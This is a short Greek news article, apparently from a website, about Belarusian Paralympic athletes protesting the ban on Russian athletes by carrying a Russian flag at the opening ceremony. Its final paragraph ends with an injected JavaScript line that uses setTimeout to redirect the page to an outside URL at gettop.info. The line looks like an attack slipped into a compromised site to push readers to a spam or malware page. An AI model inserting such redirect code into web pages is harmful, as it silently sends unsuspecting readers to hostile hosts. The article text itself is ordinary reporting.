Διαμαρτυρία υπέρ της Ρωσίας από τη Λευκορωσία στους Παραολυμπιακούς

0
13

 

Αμφιλεγόμενες αντιδράσεις προκάλεσε ο αποκλεισμός όλων των Ρώσων αθλητών τόσο από τους Ολυμπιακούς όσο και από τους Παραολυμπιακούς Αγώνες λόγω σκανδάλου ντόπινγκ που ξέσπασε στη χώρα.

Αυτήν τη φορά και με αφορμη την Τελετή έναρξης των Παραολυμπιακών, ο πρόεδρος της Παραολυμπιακής Επιτροπής, Sir Philip Craven, είχε υπερασπιστεί πλήρως τον αποκλεισμό όλων των Ρώσων αθλητών από τους αγώνες, τονίζοντας ότι υπήρχαν αποδείξεις ότι η Ρωσία προσπάθησε να νομιμοποιήσει την «κλεψιά» προς όφελος όλων των αθλητών της χώρας, και τόνισε ότι η απόφαση ήταν ομόφωνη.

Ωστόσο, οι αθλητές της Λευκορωσίας αντέδρασαν στην απόφαση αυτή και επέδειξαν τη διαμαρτυρία τους κατά την τελετή έναρξης των Παραολυμπιακών. Άλλωστε, ο Λευκορώσος πρόεδρος της Παραολυμπιακής Ομοσπονδίας Ολεγκ Σέπελ, είχε πει σύμφωνα με δημοσιεύματα ότι θα δείξει την αλληλεγγύη του στους 267 Ρώσους αθλητές που αποκλείστηκαν από τους αγώνες.

Μέλος της ομάδας της Λευκορωσίας μπήκε στο στάδιο κρατώντας μία σημαία της Ρωσίας, προς ένδειξη συμπαράστασης και διαμαρτυρίας για τον αποκλεισμό των Ρώσων αθλητών από τους αγώνες. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here